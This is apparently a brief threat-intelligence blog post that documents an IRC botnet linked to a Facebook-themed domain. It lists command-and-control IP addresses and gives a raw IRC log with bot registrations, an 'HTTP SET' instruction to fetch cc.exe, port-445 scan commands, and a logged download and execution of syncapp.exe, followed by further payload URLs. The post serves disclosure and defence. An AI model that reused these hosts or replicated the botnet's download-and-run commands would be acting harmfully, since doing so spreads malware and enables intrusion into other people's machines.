www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Remote Host Port Number
213.202.225.40 80
213.202.225.48 80
74.206.242.164 80
46.45.164.166 81 IRCD HERE

NICK [N00_USA_XP_8072956]
JOIN #c
MODE [00_USA_XP_9406831] -ix
USER SP2-351 * 0 :COMPUTERNAME
PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe
PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads.
PRIVMSG #c :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 15 threads.
PRIVMSG #c :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.
PRIVMSG #c :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
NICK [00_USA_XP_9406831]
USER SP2-307 * 0 :COMPUTERNAME

UPDATE:
Remote Host Port Number
213.202.225.40 80
213.202.225.48 80
46.45.164.164 80
74.206.242.164 80
46.45.164.174 81 ircd here

NICK [00_USA_XP_6506493]
MODE #t1 -ix
PRIVMSG #t1 :download; File download: 152.0KB to: c:syncapp.exe @ 4.9KB/sec.
PRIVMSG #t1 :download; Created process: “c:syncapp.exe”, PID:
USER SP2-176 * 0 :COMPUTERNAME
MODE [00_USA_XP_6506493] -ix
JOIN #t1

* The data identified by the following URLs was then requested from the remote web server:
o http://chillly.ch.ohost.de/aze/azenv.php
o http://bentseather.be.funpic.de/azenv.php
o http://46.45.164.164/cc.exe
o http://www.pr0.net/deny2/azenv.php

hosting infos:
http://whois.domaintools.com/46.45.164.166

Categories: Uncategorized